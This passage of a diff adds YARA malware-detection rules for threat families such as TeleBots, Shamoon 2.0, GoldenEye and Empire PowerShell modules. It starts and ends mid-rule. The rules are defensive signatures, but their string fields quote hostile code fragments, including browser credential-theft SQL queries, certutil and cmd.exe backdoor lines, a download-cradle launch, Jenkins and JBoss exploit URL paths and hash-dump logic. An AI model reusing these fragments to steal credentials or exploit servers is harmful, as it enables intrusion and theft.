+      $s2 = "Oracle process memory successfully modified!" fullword wide
+      $s3 = "Unable to reset the memory protection mask to the memory" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+}
+
+rule EquationGroup_EquationDrug_Gen_1_RID33A4 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "EquationGroup Malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/tcSoiJ"
+      date = "2017-01-13 14:56:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "694be2698bcc5c7a1cce11f8ef65c1c96a883d14b98148c36b32888fb58b6a7e"
+      hash2 = "73d1d55493886639c619e9f5e312daab93e4feeb74f24dbe51593842baac8d15"
+      hash3 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Injection Lib -  GetProcAddress failed on Kernel32.DLL function" fullword wide
+      $x2 = "Injection Lib -  JUMPUP failed to open requested process" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or ( all of them )
+}
+
+rule Venom_Rootkit_RID2C61 : APT DEMO LINUX MAL T1014 {
+   meta:
+      description = "Venom Linux Rootkit"
+      author = "Florian Roth"
+      reference = "https://security.web.cern.ch/security/venom.shtml"
+      date = "2017-01-12 09:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, LINUX, MAL, T1014"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%%VENOM%CTRL%MODE%%" ascii fullword
+      $s2 = "%%VENOM%OK%OK%%" ascii fullword
+      $s3 = "%%VENOM%WIN%WN%%" ascii fullword
+      $s4 = "%%VENOM%AUTHENTICATE%%" ascii fullword
+      $s5 = ". entering interactive shell" ascii fullword
+      $s6 = ". processing ltun request" ascii fullword
+      $s7 = ". processing rtun request" ascii fullword
+      $s8 = ". processing get request" ascii fullword
+      $s9 = ". processing put request" ascii fullword
+      $s10 = "venom by mouzone" ascii fullword
+      $s11 = "justCANTbeSTOPPED" ascii fullword
+   condition: 
+      filesize < 4000KB and 2 of them
+}
+
+rule GRIZZLY_STEPPE_Malware_1_RID2F34 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Semiautomatically generated YARA rule - file HRDG022184_certclint.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/WVflzO"
+      date = "2016-12-29 11:47:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii
+      $s2 = "Repeat last find command)Replace specific text with different text" fullword wide
+      $s3 = "l\\Processor(0)\\% Processor Time" fullword wide
+      $s6 = "Self Process" fullword wide
+      $s7 = "Default Process" fullword wide
+      $s8 = "Star Polk.exe" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 4 of them )
+}
+
+rule GRIZZLY_STEPPE_Malware_2_RID2F35 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://goo.gl/WVflzO"
+      date = "2016-12-29 11:47:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
+      hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "GoogleCrashReport.dll" fullword ascii
+      $s1 = "CrashErrors" fullword ascii
+      $s2 = "CrashSend" fullword ascii
+      $s3 = "CrashAddData" fullword ascii
+      $s4 = "CrashCleanup" fullword ascii
+      $s5 = "CrashInit" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )
+}
+
+rule TeleBots_IntercepterNG_RID2FAC : APT DEMO EXE FILE G0034 MAL {
+   meta:
+      description = "Detects TeleBots malware - IntercepterNG"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4if3HG"
+      date = "2016-12-14 12:07:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5f9fef7974d37922ac91365588fbe7b544e13abbbde7c262fe30bade7026e118"
+      tags = "APT, DEMO, EXE, FILE, G0034, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage: %s iface_num\\dump [mode] [w] [-gw] [-t1 ip]" fullword ascii
+      $s2 = "Target%d found: %s - [%.2X-%.2X-%.2X-%.2X-%.2X-%.2X]" fullword ascii
+      $s3 = "3: passwords + files, no arp poison" fullword ascii
+      $s4 = "IRC Joining Keyed Channel intercepted" fullword ascii
+      $s5 = "-tX - set target ip" fullword ascii
+      $s6 = "w - save session to .pcap dump" fullword ascii
+      $s7 = "example: %s 1 1 -gw 192.168.1.1 -t1 192.168.1.3 -t2 192.168.1.5" fullword ascii
+      $s8 = "ORACLE8 DES Authorization intercepted" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 4 of them )
+}
+
+rule TeleBots_KillDisk_1_RID2E39 : APT DEMO EXE FILE G0034 MAL {
+   meta:
+      description = "Detects TeleBots malware - KillDisk"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4if3HG"
+      date = "2016-12-14 11:05:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8246f709efa922a485e1ca32d8b0d10dc752618e8b3fce4d3dd58d10e4a6a16d"
+      tags = "APT, DEMO, EXE, FILE, G0034, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Plug-And-Play Support Service" fullword wide
+      $s2 = " /c \"echo Y|" fullword wide
+      $s3 = "-set=06.12.2016#09:30 -est=1410" fullword ascii
+      $s4 = "%d.%d.%d#%d:%d" fullword ascii
+      $s5 = " /T /C /G " fullword wide
+      $s6 = "[-] > %ls" fullword wide
+      $s7 = "[+] > %ls" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 4 of them ) or ( 6 of them )
+}
+
+rule TeleBots_KillDisk_2_RID2E3A : APT DEMO EXE FILE G0034 MAL {
+   meta:
+      description = "Detects TeleBots malware - KillDisk"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4if3HG"
+      date = "2016-12-14 11:05:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "26173c9ec8fd1c4f9f18f89683b23267f6f9d116196ed15655e9cb453af2890e"
+      tags = "APT, DEMO, EXE, FILE, G0034, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Plug-And-Play Support Service" fullword wide
+      $s2 = " /c \"echo Y|" fullword wide
+      $s3 = "%d.%d.%d#%d:%d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+}
+
+rule TeleBots_CredRaptor_Password_Stealer_RID3569 : APT DEMO EXE FILE G0034 MAL T1003 {
+   meta:
+      description = "Detects TeleBots malware - CredRaptor Password Stealer"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4if3HG"
+      date = "2016-12-14 16:12:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "50b990f6555055a265fde98324759dbc74619d6a7c49b9fd786775299bf77d26"
+      tags = "APT, DEMO, EXE, FILE, G0034, MAL, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\Documents and Settings\\Administrator\\Desktop\\GetPAI\\Out\\IE.pdb" fullword ascii
+      $s2 = "SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins" fullword ascii
+      $s3 = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS" fullword ascii
+      $s4 = ".\\PAI\\IEforXPpasswords.txt" ascii
+      $s5 = "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+      $s6 = "Opera old version credentials" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( 4 of them )
+}
+
+rule TeleBots_VBS_Backdoor_1_RID2F91 : APT DEMO FILE G0034 MAL SCRIPT {
+   meta:
+      description = "Detects TeleBots malware - VBS Backdoor"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4if3HG"
+      date = "2016-12-14 12:02:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eb31a918ccc1643d069cf08b7958e2760e8551ba3b88ea9e5d496e07437273b2"
+      tags = "APT, DEMO, FILE, G0034, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd = \"cmd.exe /c \" + arg + \" >\" + outfile +\" 2>&1\"" fullword ascii
+      $s2 = "GetTemp = \"c:\\WINDOWS\\addins\"" fullword ascii
+      $s3 = "elseif (arg0 = \"-dump\") Then" fullword ascii
+      $s4 = "decode = \"certutil -decode \" + source + \" \" + dest  " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x6553 and filesize < 8KB and 1 of them ) or ( all of them )
+}
+
+rule TeleBots_VBS_Backdoor_2_RID2F92 : APT DEMO FILE G0034 MAL SCRIPT {
+   meta:
+      description = "Detects TeleBots malware - VBS Backdoor"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4if3HG"
+      date = "2016-12-14 12:02:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1b2a5922b58c8060844b43e14dfa5b0c8b119f281f54a46f0f1c34accde71ddb"
+      tags = "APT, DEMO, FILE, G0034, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd = \"cmd.exe /c \" + arg + \" \" + arg2" fullword ascii
+      $s2 = "Dim WMI:  Set WMI = GetObject(\"winmgmts:\\\\.\\root\\cimv2\")" fullword ascii
+      $s3 = "cmd = \"certutil -encode -f \" + source + \" \" + dest" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x6944 and filesize < 30KB and 1 of them ) or ( 2 of them )
+}
+
+rule TeleBots_Win64_Spy_KeyLogger_G_RID3253 : APT DEMO EXE FILE G0034 MAL T1056 {
+   meta:
+      description = "Detects TeleBots malware - Win64 Spy KeyLogger G"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4if3HG"
+      date = "2016-12-14 14:00:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e3f134ae88f05463c4707a80f956a689fba7066bb5357f6d45cba312ad0db68e"
+      tags = "APT, DEMO, EXE, FILE, G0034, MAL, T1056"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\WRK\\GHook\\gHook\\x64\\Debug\\gHookx64.pdb" fullword ascii
+      $s2 = "Install hooks error!" fullword wide
+      $s4 = "%ls%d.~tmp" fullword wide
+      $s5 = "[*]Window PID > %d: " fullword wide
+      $s6 = "Install hooks ok!" fullword wide
+      $s7 = "[!]Clipboard paste" fullword wide
+      $s9 = "[*] IMAGE : %ls" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 3 of them )
+}
+
+rule GoldenEye_Ransomware_XLS_RID3061 : CRIME DEMO FILE MAL RANSOM T1193 T1203 {
+   meta:
+      description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"
+      author = "Florian Roth"
+      reference = "https://goo.gl/jp2SkT"
+      date = "2016-12-06 12:37:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"
+      tags = "CRIME, DEMO, FILE, MAL, RANSOM, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii
+      $x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xcfd0 and filesize < 4000KB and 1 of them )
+}
+
+rule GoldenEyeRansomware_Dropper_MalformedZoomit_RID385F : DEMO EXE FILE MAL {
+   meta:
+      description = "Dropped Executable - "
+      author = "Florian Roth"
+      reference = "https://goo.gl/jp2SkT"
+      date = "2016-12-06 18:18:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii
+      $n1 = "Mark Russinovich" wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 800KB and $s1 and not $n1 )
+}
+
+rule Shamoon2_Wiper_RID2C7E : APT DEMO EXE FILE MIDDLE_EAST {
+   meta:
+      description = "Detects Shamoon 2.0 Wiper Component"
+      author = "Florian Roth"
+      reference = "https://goo.gl/jKIfGB"
+      date = "2016-12-01 09:51:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
+      hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
+      tags = "APT, DEMO, EXE, FILE, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
+      $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
+      $s1 = "UFWYNYNTS" fullword wide
+      $s2 = "\\\\?\\ElRawDisk" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
+}
+
+rule Shamoon2_ComComp_RID2D25 : APT DEMO EXE FILE MIDDLE_EAST T1083 {
+   meta:
+      description = "Detects Shamoon 2.0 Communication Components"
+      author = "Florian Roth"
+      reference = "https://goo.gl/jKIfGB"
+      date = "2016-12-01 10:19:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
+      tags = "APT, DEMO, EXE, FILE, MIDDLE_EAST, T1083"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "mkdir %s%s > nul 2>&1" fullword ascii
+      $s2 = "p[%s%s%d.%s" fullword ascii
+      $op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 } 
+      $op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d } 
+      $op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( all of ( $s* ) or all of ( $op* ) )
+}
+
+rule EldoS_RawDisk_RID2BFC : APT DEMO EXE FILE MIDDLE_EAST {
+   meta:
+      description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
+      author = "Florian Roth"
+      reference = "https://goo.gl/jKIfGB"
+      date = "2016-12-01 09:29:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
+      hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
+      tags = "APT, DEMO, EXE, FILE, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "g\\system32\\" fullword wide
+      $s2 = "ztvttw" fullword wide
+      $s3 = "lwizvm" fullword ascii
+      $s4 = "FEJIKC" fullword ascii
+      $s5 = "INZQND" fullword ascii
+      $s6 = "IUTLOM" fullword wide
+      $s7 = "DKFKCK" fullword ascii
+      $op1 = { 94 35 77 73 03 40 eb e9 } 
+      $op2 = { 80 7c 41 01 00 74 0a 3d } 
+      $op3 = { 74 0a 3d 00 94 35 77 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them )
+}
+
+rule Empire_Invoke_MetasploitPayload_RID3389 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 14:52:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
+      $s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
+}
+
+rule Empire_Exploit_Jenkins_RID2FE8 : DEMO EXPLOIT HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Exploit-Jenkins.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:17:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
+      tags = "DEMO, EXPLOIT, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
+      $s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
+      $s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
+}
+
+rule Empire_Get_SecurityPackages_RID31C8 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Get-SecurityPackages.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 13:37:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
+      $s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_PowerDump_RID3040 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-PowerDump.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:31:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x16 = "$enc = Get-PostHashdumpScript" fullword ascii
+      $x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
+      $x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
+}
+
+rule Empire_Install_SSP_RID2DFE : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Install-SSP.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 10:55:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_ShellcodeMSIL_RID3165 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 13:20:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$FinalShellcode.Length" fullword ascii
+      $s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
+      $s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
+      $s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+}
+
+rule HKTL_Empire_PowerUp_RID2E36 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file PowerUp.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 11:04:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
+}
+
+rule Empire_Get_GPPPassword_RID2F8B : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Get-GPPPassword.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:01:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
+      $s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
+      $s3 = "function Get-DecryptedCpassword {" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_SmbScanner_RID3089 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-SmbScanner.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:44:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
+      $s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+}
+
+rule Empire_Exploit_JBoss_RID2EF7 : DEMO EXPLOIT HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Exploit-JBoss.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 11:37:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
+      tags = "DEMO, EXPLOIT, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Exploit-JBoss" fullword ascii
+      $s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
+      $s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
+      $s4 = "http://blog.rvrsh3ll.net" fullword ascii
+      $s5 = "Remote URL to your own WARFile to deploy." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+}
+
+rule Empire_dumpCredStore_RID2F13 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file dumpCredStore.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 11:41:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
+      $s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
+      $s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x233c and filesize < 40KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_EgressCheck_RID30E4 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-EgressCheck.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:59:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x233c and filesize < 10KB and 1 of them ) or all of them
+}
+
+rule Empire_ReflectivePick_x64_orig_RID32B3 : DEMO EXE FILE HKTL SCRIPT T1064 {
+   meta:
+      description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 14:16:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
